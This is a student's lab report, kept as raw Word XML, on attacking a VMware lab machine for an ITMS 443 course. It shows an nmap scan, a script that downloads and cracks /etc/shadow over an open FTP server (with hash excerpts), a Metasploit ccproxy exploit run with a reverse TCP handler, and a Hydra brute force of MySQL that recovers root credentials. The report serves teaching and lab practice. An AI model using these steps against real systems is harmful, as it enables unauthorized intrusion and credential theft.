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032" w:rsidRDefault="00E838B0">
      <w:r>
        <w:t>Henry Post</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E838B0" w:rsidRDefault="00E838B0">
      <w:r>
        <w:t>ITMS 443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E838B0" w:rsidRDefault="00E838B0" w:rsidP="00E838B0">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploiting a </w:t>
      </w:r>
      <w:r w:rsidR="00A53960">
        <w:t>targe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44276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838B0" w:rsidRDefault="00E838B0">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="006A63C0" w:rsidRDefault="00E838B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6A63C0" w:rsidRPr="006C52BF">
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="006A63C0" w:rsidRPr="006C52BF">
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="006A63C0">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:instrText>HYPERLINK \l "_Toc528175309"</w:instrText>
          </w:r>
          <w:r w:rsidR="006A63C0" w:rsidRPr="006C52BF">
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="006A63C0" w:rsidRPr="006C52BF">
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
            </w:rPr>
          </w:r>
          <w:r w:rsidR="006A63C0" w:rsidRPr="006C52BF">
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="006A63C0" w:rsidRPr="006C52BF">
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
            </w:rPr>
            <w:t>Notes</w:t>
          </w:r>
          <w:r w:rsidR="006A63C0">
            <w:rPr>
              <w:noProof/>
              <w:webHidden/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidR="006A63C0">
            <w:rPr>
              <w:noProof/>
              <w:webHidden/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="006A63C0">
            <w:rPr>
              <w:noProof/>
              <w:webHidden/>
            </w:rPr>
            <w:instrText xml:space="preserve"> PAGEREF _Toc528175309 \h </w:instrText>
          </w:r>
          <w:r w:rsidR="006A63C0">
            <w:rPr>
              <w:noProof/>
              <w:webHidden/>
            </w:rPr>
          </w:r>
          <w:r w:rsidR="006A63C0">
            <w:rPr>
              <w:noProof/>
              <w:webHidden/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="006A63C0">
            <w:rPr>
              <w:noProof/>
              <w:webHidden/>
            </w:rPr>
            <w:t>2</w:t>
          </w:r>
          <w:r w:rsidR="006A63C0">
            <w:rPr>
              <w:noProof/>
              <w:webHidden/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r w:rsidR="006A63C0" w:rsidRPr="006C52BF">
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w:rsidR="006A63C0" w:rsidRDefault="006A63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75310" w:history="1">
            <w:r w:rsidRPr="006C52BF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recon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C0" w:rsidRDefault="006A63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75311" w:history="1">
            <w:r w:rsidRPr="006C52BF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Explo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C0" w:rsidRDefault="006A63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75312" w:history="1">
            <w:r w:rsidRPr="006C52BF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Unsecured FT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C0" w:rsidRDefault="006A63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75313" w:history="1">
            <w:r w:rsidRPr="006C52BF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ccproxy-ftp buffer ove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63C0" w:rsidRDefault="006A63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175314" w:history="1">
            <w:r w:rsidRPr="006C52BF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MySQL login brute-force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1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38B0" w:rsidRDefault="00E838B0">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00E838B0" w:rsidRDefault="00E838B0">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D747B1" w:rsidRDefault="00D747B1" w:rsidP="00D747B1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc528175309"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Notes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00B93F23" w:rsidRDefault="00D747B1" w:rsidP="00D747B1">
      <w:r>
        <w:t>If you look at my previous assignments, you’ll notice I always include all the commands</w:t>
      </w:r>
      <w:r w:rsidR="00677158">
        <w:t xml:space="preserve"> in a folder called `scripts`.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D747B1" w:rsidRDefault="00B93F23" w:rsidP="00D747B1">
      <w:r>
        <w:t>The same thing applies here.</w:t>
      </w:r>
      <w:r w:rsidR="00D747B1">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D747B1" w:rsidRDefault="00D747B1" w:rsidP="00D747B1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc528175310"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00D747B1" w:rsidRDefault="00D747B1" w:rsidP="00D747B1">
      <w:r>
        <w:t>I did some minor reconnaissance before beginning any exploits, as all I knew about my target was its IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E27D8" w:rsidRDefault="000E27D8" w:rsidP="00D747B1">
      <w:r>
        <w:t>I used `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>` to scan all 65535 ports on the target machine, and then picked some cool-looking ones.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E27D8" w:rsidRPr="00F679FD" w:rsidRDefault="000E27D8" w:rsidP="00F679FD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Starting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map</w:t>
      </w:r>
      <w:proofErr w:type="spell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7.70 </w:t>
      </w:r>
      <w:proofErr w:type="gram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( https</w:t>
      </w:r>
      <w:proofErr w:type="gram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://nmap.org ) at 2018-10-22 16:33 EDT</w:t>
      </w:r>
      <w:r w:rsidR="00085C07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map</w:t>
      </w:r>
      <w:proofErr w:type="spell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scan report for 172.43.0.154</w:t>
      </w:r>
      <w:r w:rsidR="00085C07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Host is up (0.00049s latency).</w:t>
      </w:r>
      <w:r w:rsidR="00085C07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ot shown: 65505 closed ports</w:t>
      </w:r>
      <w:r w:rsidR="00BD6014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PORT      STATE SERVICE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1/tcp    open  ftp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22/tcp  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ssh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23/tcp    open  telnet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25/tcp  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smtp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3/tcp    open  domai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0/tcp    open  http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111/tcp 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rpcbind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139/tcp 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etbios-ssn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445/tcp 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microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spell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-ds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12/tcp   open  exec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13/tcp   open  logi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14/tcp   open  shell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1099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rmiregistry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1524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ingreslock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2049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fs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2121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ccproxy</w:t>
      </w:r>
      <w:proofErr w:type="spell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-ftp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3306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mysql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3632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distccd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5432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postgresql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5900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vnc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6000/tcp  open  X11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6667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irc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6697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ircs</w:t>
      </w:r>
      <w:proofErr w:type="spell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-u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009/tcp  open  ajp13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8180/tcp  open  unknow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8787/tcp  open  </w:t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msgsrvr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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33686/tcp open  unknow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41710/tcp open  unknow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48661/tcp open  unknow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58745/tcp open  unknown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MAC Address: 00:50:56:9A:AE:15 (VMware)</w:t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B319D8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proofErr w:type="spellStart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Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F679FD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done: 1 IP address (1 host up) scanned in 3.83 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E27D8" w:rsidRDefault="000E27D8" w:rsidP="00D747B1"/>
    <w:p w:rsidR="00D747B1" w:rsidRPr="00D747B1" w:rsidRDefault="00D747B1" w:rsidP="00D747B1"/>
    <w:p w:rsidR="00D747B1" w:rsidRDefault="00D747B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38B0" w:rsidRDefault="00D747B1" w:rsidP="00D747B1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc528175311"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploits</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00D747B1" w:rsidRDefault="00D747B1" w:rsidP="00D747B1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc528175312"/>
      <w:r>
        <w:t>Unsecured FTP server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="005C0D1A" w:rsidRDefault="005C0D1A" w:rsidP="005C0D1A">
      <w:r>
        <w:t>I chose the `ftp` service running on port `21` first, by virtue of curiosity and the fact that it was first.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C0D1A" w:rsidRDefault="000D5F67" w:rsidP="005C0D1A">
      <w:r>
        <w:t>I then connected to it using `ftp &lt;HOST&gt;`, and to my surprise, it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D5F67" w:rsidRDefault="000D5F67" w:rsidP="005C0D1A">
      <w:r>
        <w:t xml:space="preserve">I then made a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> script that downloads `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>/` and `/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/shadow` into the `</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>out/` folder, and then unshadows and cracks those files using John the Ripper.</w:t>
      </w:r>
      <w:r w:rsidR="00C458C4">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C458C4">
        <w:br/>
        <w:t>Below is an excerpt from the `shadow` file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C458C4" w:rsidRPr="00C458C4" w:rsidRDefault="00C458C4" w:rsidP="00C458C4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spacing w:line="320" w:lineRule="atLeast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C458C4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root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::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  <w:t>daemon:*:14684:0:99999:7:::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  <w:t>bin:*:14684:0:99999:7:::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C458C4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sys:$1$fUX6BPOt$Miyc3UpOzQ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Jqz4s5wFD9l0:14742:0:99999:7:::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  <w:t>sync:*:14684:0:99999:7:::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C458C4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games:*:14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C458C4" w:rsidRDefault="00C458C4" w:rsidP="00C458C4">
      <w:bookmarkStart w:id="5" w:name="_Hlk528003517"/>
      <w:r>
        <w:br/>
        <w:t>The fact that I can download this file means I could potentially download ANY file on the system.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F74A9E" w:rsidRDefault="00F74A9E" w:rsidP="00F74A9E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc528175313"/>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ccproxy</w:t>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="_Hlk528003516"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-ftp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="7"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00F74A9E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>buffer overflow</w:t>
        </w:r>
        <w:bookmarkEnd w:id="6"/>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F74A9E" w:rsidRDefault="00F74A9E" w:rsidP="00F74A9E">
      <w:r>
        <w:t xml:space="preserve">In the same vein (ftp) of services, I saw </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ccproxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-ftp running, and decided to go on Google to see if there were any exploits available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F74A9E" w:rsidRDefault="00F74A9E" w:rsidP="00F74A9E">
      <w:r>
        <w:t xml:space="preserve">Luckily for me, there was a </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00F74A9E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>metasploit</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00F74A9E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> module</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> available that I could take advantage of.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000559F8" w:rsidRDefault="000559F8" w:rsidP="00F74A9E">
      <w:r>
        <w:t xml:space="preserve">There is an </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="000559F8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>asciinema</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="000559F8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> screen recording</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000559F8" w:rsidRDefault="000559F8" w:rsidP="000559F8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spacing w:line="320" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="underline"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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&gt; use exploit/windows/proxy/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ccproxy_telnet_ping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D043F4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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="underline"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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exploit(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fg-9"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DD3C69"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>windows/proxy/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fg-9"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DD3C69"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ccproxy_telnet_ping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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) &gt; set RHOST 172.43.0.154</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve">RHOST =&gt; 172.43.0.154 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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00451CFF">
        <w:rPr>
          <w:rStyle w:val="underline"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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exploit(</w:t>
      </w:r>
      <w:r w:rsidR="00451CFF">
        <w:rPr>
          <w:rStyle w:val="fg-9"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DD3C69"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>windows/proxy/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00451CFF">
        <w:rPr>
          <w:rStyle w:val="fg-9"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DD3C69"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ccproxy_telnet_ping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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) &gt; exploit                                                                                                        </w:t>
      </w:r>
      <w:r w:rsidR="00451CFF">
        <w:rPr>
          <w:rStyle w:val="fg-12"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="26B0D7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[*]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Started reverse TCP handler on </w:t>
      </w:r>
      <w:bookmarkStart w:id="8" w:name="_Hlk528076854"/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172.43.35.101</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/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:4444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451CFF">
        <w:rPr>
          <w:rStyle w:val="fg-12"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="26B0D7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[*]</w:t>
      </w:r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</w:t>
      </w:r>
      <w:bookmarkStart w:id="9" w:name="OLE_LINK1"/>
      <w:bookmarkStart w:id="10" w:name="OLE_LINK2"/>
      <w:r w:rsidR="00451CF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Exploit completed, but no session was created.  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="005819C1" w:rsidRDefault="005819C1" w:rsidP="005819C1"/>
    <w:p w:rsidR="00AE1957" w:rsidRDefault="00AE1957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1259D" w:rsidRDefault="00D1259D" w:rsidP="00D1259D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc528175314"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MySQL login brute-force attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="005819C1" w:rsidRDefault="00177C58" w:rsidP="00FF47FF">
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:t>Using Hydra, I was able to launch a (slow) brute-force attack against the MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00C35B4A">
        <w:t xml:space="preserve"> server at port 3306.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C4F95" w:rsidRDefault="008C4F95" w:rsidP="00FF47FF">
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I was </w:t>
      </w:r>
      <w:r w:rsidR="00975B7F">
        <w:t>able to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00975B7F" w:rsidRDefault="00975B7F" w:rsidP="00975B7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Launch a brute-force attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00975B7F" w:rsidRDefault="00975B7F" w:rsidP="00975B7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Get in with the `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>` credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C4F95" w:rsidRPr="008C4F95" w:rsidRDefault="008C4F95" w:rsidP="00AE1957">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="121314"/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</w:pPr>
      <w:r w:rsidRPr="00DD1C5F">
        <w:rPr>
          <w:rStyle w:val="fg-9"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DD3C69"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>root@kali-x43-35</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1C5F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:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1C5F">
        <w:rPr>
          <w:rStyle w:val="fg-12"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="26B0D7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>~/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD1C5F">
        <w:rPr>
          <w:rStyle w:val="fg-12"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="26B0D7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GitHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD1C5F">
        <w:rPr>
          <w:rStyle w:val="fg-12"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="26B0D7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/itms-443/labs/4/scripts</w:t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# ./mysql_bruteforce.pl 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Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not us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e in military or secret service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organizations, or for illegal purposes.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Hydra (http://www.thc.org/thc-hydra) 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starting at 2018-10-24 14:25:52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INFO] Reduced number of tasks to 4 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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does not 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like many parallel connections</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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)</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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[WARNING] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Restorefile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(you have 10 seconds to abort... (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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opt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ion -I to skip waiting)) from a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previous session found, to prevent overwriting, ./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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hydra.restore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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DATA] max 4 tasks per 1 server, overall 4 tasks, 35 login tri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es (l:5/p:7), ~9 tries per task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DATA] attac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king mysql://172.43.0.154:3306/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root" - pass "password"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- 1 of 35 [child 0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root" - pa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ss "" - 2 of 35 [child 1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root" - pass "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root" - 3 of 35 [child 2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root" - pass "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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toor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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" - 4 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of 35 [child 3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root" - pass "a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dmin" - 5 of 35 [child 2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STATUS] 5.00 tries/min, 5 tries in 00:01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h, 30 to do in 00:07h, 4 active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root" - pass "login" - 6 of 35 [chil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d 3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</w:t>
      </w:r>
      <w:r w:rsidRPr="006C3973">
        <w:rPr>
          <w:rStyle w:val="line"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3306</w:t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][</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3973">
        <w:rPr>
          <w:rStyle w:val="line"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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] host: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C3973">
        <w:rPr>
          <w:rStyle w:val="line"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>172.43.0.154</w:t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 xml:space="preserve">   login: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C3973">
        <w:rPr>
          <w:rStyle w:val="line"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>root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ATTEMPT] target 172.43.0.154 - login "admin" - pass "pass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word" - 8 of 35 [child 1] (0/0)</w:t>
      </w:r>
      <w:r w:rsidR="000A577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br/>
      </w:r>
      <w:r w:rsidRPr="008C4F95">
        <w:rPr>
          <w:rStyle w:val="line"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[STATUS] 4.00 tries/min, 8 tries in 00:02h, 27 to do in 00:07h, 4 active</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C4F95" w:rsidRPr="005819C1" w:rsidRDefault="008C4F95" w:rsidP="00FF47FF">
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008C4F95" w:rsidRPr="00581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E374F"/>
